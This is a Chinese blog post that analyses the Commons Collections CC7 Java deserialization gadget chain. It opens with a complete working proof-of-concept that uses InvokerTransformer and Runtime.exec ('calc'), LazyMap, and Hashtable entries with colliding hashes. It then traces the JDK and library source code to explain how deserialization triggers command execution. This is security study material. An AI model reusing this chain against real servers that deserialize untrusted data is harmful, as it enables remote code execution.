12-java安全——java反序列化CC7链分析

最新推荐文章于 2024-07-09 16:24:22 发布
最新推荐文章于 2024-07-09 16:24:22 发布
阅读量2.7k 收藏 7
点赞数 8
分类专栏: 网络安全 文章标签: java 反序列化漏洞 安全开发 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35733751/article/details/119862728
版权

在分析CC7链之前,需要对Hashtable集合的源码有一定的了解。

从思路上来说,我觉得CC7利用链更像是从CC6利用链改造而来,只不过是CC7链没有使用HashSet,而是使用了Hashtable来构造新的利用链。

经过测试,CC7利用链在jdk8u071和jdk7u81都可以利用成功,payload代码如下:

package com.cc;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

/*
        基于Hashtable的利用链
 */
public class CC7Test {

    public static void main(String[] args) throws Exception {
        //构造核心利用代码
        final Transformer transformerChain = new ChainedTransformer(new Transformer[0]);
        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
                new ConstantTransformer(1)};

        //使用Hashtable来构造利用链调用LazyMap
        Map hashMap1 = new HashMap();
        Map hashMap2 = new HashMap();
        Map lazyMap1 = LazyMap.decorate(hashMap1, transformerChain);
        lazyMap1.put("yy", 1);
        Map lazyMap2 = LazyMap.decorate(hashMap2, transformerChain);
        lazyMap2.put("zZ", 1);
        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 1);
        lazyMap2.remove("yy");
        //输出两个元素的hash值
        System.out.println("lazyMap1 hashcode:" + lazyMap1.hashCode());
        System.out.println("lazyMap2 hashcode:" + lazyMap2.hashCode());


        //iTransformers = transformers(反射)
        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerChain, transformers);

        //序列化  -->  反序列化(hashtable)
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(hashtable);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        ois.readObject();
    }
}

CC7利用链分析:

1. 使用Transformer数组来构造利用代码,然后通过反射将transformers数组设置给ChaniedTransformer类的iTransformers属性,这一步和CC6利用链的构造思路上基本一致,没什么好说的。

2. 在构造利用链时,CC7仍然使用了LazyMap来构造利用链,不同的是,CC7使用了新的链Hashtable来触发LazyMap利用链,最终执行核心利用代码。

经过前面CC1到CC6的学习,相信大家对于Transformer数组来构造利用代码这一块已经非常熟悉了,这里就不再赘述,我们重点分析Hashtable是如何构造利用链的,在反序列化时又是如何触发LazyMap链的。

先来看Hashtable序列化过程

    private void writeObject(java.io.ObjectOutputStream s) throws IOException {
		//临时变量(栈)
        Entry<Object, Object> entryStack = null;

        synchronized (this) {
            s.defaultWriteObject();

			//写入table的容量
            s.writeInt(table.length);
			//写入table的元素个数
            s.writeInt(count);

            //取出table中的元素,放入栈中(entryStack)
            for (int index = 0; index < table.length; index++) {
                Entry<?,?> entry = table[index];

                while (entry != null) {
                    entryStack =
                        new Entry<>(0, entry.key, entry.value, entryStack);
                    entry = entry.next;
                }
            }
        }

        //依次写入栈中的每个元素
        while (entryStack != null) {
            s.writeObject(entryStack.key);
            s.writeObject(entryStack.value);
            entryStack = entryStack.next;
        }
    }

Hashtable有一个Entry<?,?>[]类型的table属性,并且还是一个数组,用于存放元素(键值对)。Hashtable在序列化时会先把table数组的容量写入到序列化流中,再写入table数组中的元素个数,然后将table数组中的元素取出写入到序列化流中。

再来看Hashtable的反序列化流程:

	private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException {
        // Read in the length, threshold, and loadfactor
        s.defaultReadObject();

        // 读取table数组的容量
        int origlength = s.readInt();
		//读取table数组的元素个数
        int elements = s.readInt();

		//计算table数组的length
        int length = (int)(elements * loadFactor) + (elements / 20) + 3;
        if (length > elements && (length & 1) == 0)
            length--;
        if (origlength > 0 && length > origlength)
            length = origlength;
		//根据length创建table数组
        table = new Entry<?,?>[length];
        threshold = (int)Math.min(length * loadFactor, MAX_ARRAY_SIZE + 1);
        count = 0;

		//反序列化,还原table数组
        for (; elements > 0; elements--) {
            @SuppressWarnings("unchecked")
                K key = (K)s.readObject();
            @SuppressWarnings("unchecked")
                V value = (V)s.readObject();
            reconstitutionPut(table, key, value);
        }
    }

Hashtable会先从反序列化流中读取table数组的容量和元素个数,并根据origlength 和elements 计算出table数组的length,再根据计算得到的length来创建table数组(origlength 和elements可以决定table数组的大小),然后从反序列化流中依次读取每个元素,然后调用reconstitutionPut方法将元素重新放入table数组(Hashtable的table属性),最终完成反序列化。

reconstitutionPut方法是一个很重要的方法,我们进一步分析一下这个方法

	private void reconstitutionPut(Entry<?,?>[] tab, K key, V value) throws StreamCorruptedException {
		//value不能为null
        if (value == null) {
            throw new java.io.StreamCorruptedException();
        }

		//重新计算key的hash值
        int hash = key.hashCode();
		//根据hash值计算存储索引
        int index = (hash & 0x7FFFFFFF) % tab.length;
		//判断元素的key是否重复
        for (Entry<?,?> e = tab[index] ; e != null ; e = e.next) {
			//如果key重复则抛出异常
            if ((e.hash == hash) && e.key.equals(key)) {
                throw new java.io.StreamCorruptedException();
            }
        }
        //key不重复则将元素添加到table数组中
        @SuppressWarnings("unchecked")
            Entry<K,V> e = (Entry<K,V>)tab[index];
        tab[index] = new Entry<>(hash, key, value, e);
        count++;
    }

reconstitutionPut方法首先对value进行不为null的校验,否则抛出反序列化异常,然后根据key计算出元素在table数组中的存储索引,判断元素在table数组中是否重复,如果重复则抛出异常,如果不重复则将元素转换成Entry并添加到tabl数组中。

CC7利用链的漏洞触发的关键就在reconstitutionPut方法中,该方法在判断重复元素的时候校验了两个元素的hash值是否一样,然后接着key会调用equals方法判断key是否重复时就会触发漏洞。

需要注意的是,在添加第一个元素时并不会进入if语句调用equals方法进行判断,因此Hashtable中的元素至少为2个并且元素的hash值也必须相同的情况下才会调用equals方法,否则不会触发漏洞。

这一步操作e.key.equals()调用了LazyMap的equals方法,但是LazyMap中并没有equals方法,实际上是调用了LazyMap的父类AbstractMapDecorator的equals方法,虽然AbstractMapDecorator是一个抽象类,但它实现了equals方法。

	public boolean equals(Object object) {
		//是否为同一对象(比较引用)
		if (object == this) {
			return true;
		}
		//调用HashMap的equals方法
		return map.equals(object);
	}

AbstractMapDecorator类的equals方法只比较了这两个key的引用,如果不是同一对象会再次调用equals方法,map属性是通过LazyMap传递的,我们在构造利用链的时候,通过LazyMap的静态方法decorate将HashMap传给了map属性,因此这里会调用HashMap的equals方法。

我们在HashMap中并没有找到一个名字为equals的成员方法,但是通过分析发现HashMap继承了AbstractMap抽象类,该类中有一个equals方法

   public boolean equals(Object o) {
		//是否为同一对象
        if (o == this)
            return true;
		//运行类型是否不是Map
        if (!(o instanceof Map))
            return false;
		//向上转型
        Map<?,?> m = (Map<?,?>) o;
		//判断HashMap的元素的个数size
        if (m.size() != size())
            return false;

        try {
			//获取HashMap的迭代器
            Iterator<Entry<K,V>> i = entrySet().iterator();
            while (i.hasNext()) {
				//获取每个元素(Node)
                Entry<K,V> e = i.next();
				//获取key和value
                K key = e.getKey();
                V value = e.getValue();
				//如果value为null,则判断key
                if (value == null) {
                    if (!(m.get(key)==null && m.containsKey(key)))
                        return false;
                } else {
				//如果value不为null,判断value内容是否相同
                    if (!value.equals(m.get(key)))
                        return false;
                }
            }
        } catch (ClassCastException unused) {
            return false;
        } catch (NullPointerException unused) {
            return false;
        }

        return true;
    }

抽象类AbstractMap的equals方法进行了更为复杂的判断:

  1. 判断是否为同一对象
  2. 判断对象的运行类型
  3. 判断Map中元素的个数

当以上三个判断都不满足的情况下,则进一步判断Map中的元素,也就是判断元素的key和value的内容是否相同,在value不为null的情况下,m会调用get方法获取key的内容,虽然对象o向上转型成Map类型,但是m对象本质上是一个LazyMap。因此m对象调用get方法时实际上是调用了LazyMap的get方法。

LazyMap的get方法内部会判断当前传入的key是否已存在,如果不在则会进入if语句中调用transform方法,这个方法会调用Transformer数组中的核心利用代码构造命令执行环境,从而产生漏洞。

    public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
			//构造命令执行环境
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }

关于lazyMap2集合中的第二个元素(yy=yy)从何而来

CC7利用链的payload代码中,Hashtable在添加第二个元素时,lazyMap2集合会“莫名其妙”添加一个元素(yy=yy),起初我以为这是一个bug,后面仔细跟踪了Hashtable添加元素的过程才发现,Hashtable在调用put方法添加元素的时候会调用equals方法判断是否为同一对象,而在equals中会调用LazyMap的get方法添加一个元素(yy=yy)。

例如Hashtable调用put方法添加第二个元素(lazyMap2,1)的时候,该方法内部会调用equals方法根据元素的key判断是否为同一元素

	public synchronized V put(K key, V value) {
		//value是否为null
        if (value == null) {
            throw new NullPointerException();
        }

		//临时变量
        Entry<?,?> tab[] = table;
		//计算元素的存储索引
        int hash = key.hashCode();
        int index = (hash & 0x7FFFFFFF) % tab.length;
		//获取指定索引的链表
        @SuppressWarnings("unchecked")
        Entry<K,V> entry = (Entry<K,V>)tab[index];
		//遍历链表的节点(元素)
        for(; entry != null ; entry = entry.next) {
			//判断key是否重复
            if ((entry.hash == hash) && entry.key.equals(key)) {
				//覆盖value
                V old = entry.value;
                entry.value = value;
                return old;
            }
        }
		//key不重复则添加元素
        addEntry(hash, key, value, index);
        return null;
    }

此时的key是lazyMap2对象,而lazyMap2实际上调用了AbstractMap抽象类的equals方法,equals方法内部会调用lazyMap2的get方法判断table数组中元素的key在lazyMap2是否已存在,如果不存在,transform会把当前传入的key返回作为value,然后lazyMap2会调用put方法把key和value(yy=yy)添加到lazyMap2。

当在反序列化时,reconstitutionPut方法在还原table数组时会调用equals方法判断重复元素,由于AbstractMap抽象类的equals方法校验的时候更为严格,会判断Map中元素的个数,由于lazyMap2和lazyMap1中的元素个数不一样则直接返回false,那么也就不会触发漏洞。

因此在构造CC7利用链的payload代码时,Hashtable在添加第二个元素后,lazyMap2需要调用remove方法删除元素(yy=yy)才能触发漏洞。

lazyMap2.remove("yy");

关于CC7利用链的两个元素hash值的分析

前面我们说过触发漏洞还有一个前提:两个元素的hash值必须相同。

如下所示,在反序列化时,reconstitutionPut方法中的if判断中两个元素的hash值必须相同的情况下,才会调用eauals方法。

这也是为什么我们在构造利用链的时候必须添加两个两个元素,虽然这两个元素的hash值是一样的,但本质上是两个不同的元素。

为什么这两个LazyMap的hash值是一样的?继续跟踪hashCode方法,当LazyMap调用hashCode方法,实际上会调用AbstractMap抽象类的hashCode方法。

AbstractMap抽象类的hashCode方法实际调用了HashMap中的元素(yy=1)的hashCode方法,准确来说是Node节点的hashCode方法

Node类调用了Objects类的hashCode静态方法计算key和value的hash值,然后再进行异或运算得到一个新的hash值。

继续跟进Objects类的hashCode静态方法

到这我们基本可以知道,实际上底层调用了字符串“yy”的包装类String的hashCode方法,hashCode方法通过字符的ascii码值计算得到一个3872的hash值。

 hash值的计算过程:

第一次计算的时候val[i]的值是小写字母y,y的ascii码值就是121,h值为121。

第二次计算的时候val[i]的值是还是小写的字母y,h的值为3872=31*121+121,最终得到hash值为3872。

然后返回到Node类中的hashCode方法,进行亦或运算得到一个3873新的hash值并返回到AbstractMap类的hashCode方法中,最终lazyMap1的hash值就是3873

对于lazyMap2来说同理,字符串“zZ”同样也会调用包装类String的hashCode方法,字符串“zZ”的hash值也是3872。

 hash值的计算过程:

第一次计算的时候val[i]的值是小写字母z,h值为122。

第二次计算的时候val[i]的值是大写字母Z,h的值为:3872=31*122+90

到这基本可以明白lazyMap中元素的key值是经过精心构造的,其目的就是为了构造两个hash值相同的key,从而触发漏洞。

        lazyMap1.put("yy", 1);
        lazyMap2.put("zZ", 1);

也就是说,key的字符串是可以替换的,但key中的字符串的hash值必须相同,例如把key的字符串改成以下值同样也可以触发漏洞。

        lazyMap1.put("Ea", 1);
        lazyMap2.put("FB", 1);

到此,CC链的7条利用链就全部分析完毕,说实话CC1-CC7链的利用流程还是比较复杂,记得刚开始分析CC1链的时候遇到了蛮多问题,参考了不少文章和资料,然后写出第一篇自己所理解的CC利用链文章,基本上把所有遇到的坑都踩了一遍,虽然过程挺磨人的,但同时也收获了不少,后面就自己根据ysoserial工具的poc代码独立分析利用链的流程,感觉迈过CC链这道坎后才算是开始入门反序列化漏洞了。

song->_->
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java反序列化(九)Common Collection 7分析
Vicl1fe的博客
09-29 348
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 先放出完整的POC package
Java安全学习笔记--反序列化利用链CC7
m0_64685672的博客
01-27 1423
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 Hashtable 和HashMap很相似,使用链地址法解决哈希冲突,线程安全 Cc7和cc6差不多,cc7使用Hashtable来触发LazyMap的get方法,比cc6的稍微复杂一些。 利用链核心 final Transformer chainedTransformer= new ChainedTransformer(new Transformer[0]); Transfo
CC7分析与利用超详细
2301_79700060的博客
06-29 1416
继续看会调用equals方法,在ysoserial中把e.key为LazyMap对象,但是LazyMap对象没有equals方法,不过它继承了类,所以会调用类的equals方法:然后还会调用,那么这里的map是什么呢,朔源到LazyMap中,发现在我们在构造poc时为了使LazyMap调用到的transform方法,用了而这里的map就是HashMap,但是HashMap中没有equals方法,发现它继承了类。跟进到类中的equals方法:在这里进行了get方法的调用,条件是当value不为null时。
Commons-Collections篇-CC7
鸣蜩十四的博客
07-09 989
和CC5反序列化链相似,CC7也是后半条LazyMap执行命令链不变,但是中间过程通过AbstractMap.equals()触发LazyMap.get()方法。
Java安全反序列化-CC7反序列化漏洞POP链分析_ysoserial CommonsCollections7 PoC分析
Ho1aAs‘s Blog
03-13 2904
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. AbstractMap.equals()调用m.get()3. AbstractMapDecorator.equals()调用this.map.equals4. HashTable反序列化触发e.key.equals(key)为什么最后要lazyMap2.remove("yy")?为什么多了一个键yy?为什么yy和zZ的hash相同?POP链完 前言 CC7是另一种
CC7利用链分析
最新发布
07-09 1456
JDK 8u65环境配置参考。
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Java安全漫谈 - 07.反序列化篇(1)1
08-03
这使得Java反序列化更加灵活,但也带来了安全风险,因为恶意用户可以通过构造特殊的序列化数据来触发意想不到的行为,比如执行任意代码。 PHP的序列化和反序列化则相对封闭,开发者无法直接修改序列化数据流,...
CVE-2020-2555——Coherence反序列化初探 .pdf
09-05
CVE-2020-2555——Coherence反序列化初探 安全防御 企业安全 安全架构信息安全 安全防御
Java反序列化安全漏洞防控
04-19
Java反序列化安全漏洞是一种严重的安全威胁,它主要发生在Java程序处理序列化数据时。序列化是Java中的一种机制,可以将对象状态转换为字节流,以便存储或传输。反序列化则是将字节流恢复为Java对象的过程。 在Java...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
Java反序列化 CC7利用链记录
LTianHang的博客
02-07 134
Java反序列化 CC7利用链记录
Java安全--CC7
qq_64201116的博客
12-21 987
在学CC7的时候我有这么几个疑问1.为什么要两个LazyMap2.hashCode那一步怎么计算的3.为什么要remove yy4.为什么put两个我们可以先看一下CC7的链子是怎么走的:其实分析链子还是从命令执行走到readObject比较好理解,虽然比较麻烦,比较繁琐,但还是这样子分析提升比较大,主要是知道自己在写啥,知道某个地方我们需要传入什么,不用抄一份payload去调试。
【Web】Java反序列化CC7链——Hashtable
uuzeray的博客
03-04 1186
ok 进入for循环的事情我们已经解决了,但是想去e.key.equals(key)还得要满足e.hash == hash(&&短路机制你懂的),这里的e值为tab[index],也就是第一组传入的值,这里的hash是通过key.hashCode()获取的,也就是说要put两个hash值相等的元素进去才行,这个点我们下面单独来讲。调用了m.get(),而m是根据传入的对象获取的,也就是说如果key传入的也是LazyMap类对象,那么这里就是调用的LazyMap#get,从而为所欲为。如何解决这个问题呢?
java反序列化CC1
qq_62540010的博客
03-16 432
Java Commons Collections的利用链也被称为cc链,是在学习反序列化漏洞必不可少的一个部分。首先先介绍一下Commons Collection组件,Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合⼯ 具类。collection是set,list,queue的抽象。
[Java反序列化]JavaCC链学习(8u71前)
Y4tacker的博客
05-26 1060
文章目录写在前面前置TransformerTransformedMapChainedTransformerInvokerTransformerConstantTransformer简化的CC链(来自P神代码审计知识星球)参考链接 写在前面 仅仅只是前置知识,感谢P神,让我接触到了新的东西,下面是P神的知识星球https://govuln.com/?page=4 前置 要了解这个链子,必须要知道下面几个Transformer Transformer 能看到这是一个接口,有一个待实现的方法Transformer
CC链总结
王嘟嘟的博客
03-14 693
整理一下CC链相关的内容,单独存放,方便复习。
ysoserial CommonsColletions7分析
洋洋的小黑屋
07-12 157
CC7也是一条比较通用的链了,不过对于其原理的话,其实还是挺复杂的。文章如有错误,敬请大佬们斧正 CC7利用的是hashtable#readObject作为反序列化入口。AbstractMap的equals来触发的LazyMap的get方法 POC分析 这条链太过于复杂,无法想象大佬们是怎么样的思维挖掘出这条链的,所以只能跟着大佬的poc跟着进行调试了分析了 public class CC7 { public static void main(String[] args) throws Except
7-java安全——java反序列化CC1链分析
网络安全
07-04 3716
apache commons-collections组件反序列化漏洞的反射链也称为CC链,自从apache commons-collections组件爆出java第一个反序列化漏洞后,就像打开了新世界大门一样,之后很多java中间件也相继爆出反序列化漏洞。例如比较常用的反序列化漏洞利用工具ysoserial就使用了LazyMap类的利用链,本文将继续学习LazyMap类的利用链。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值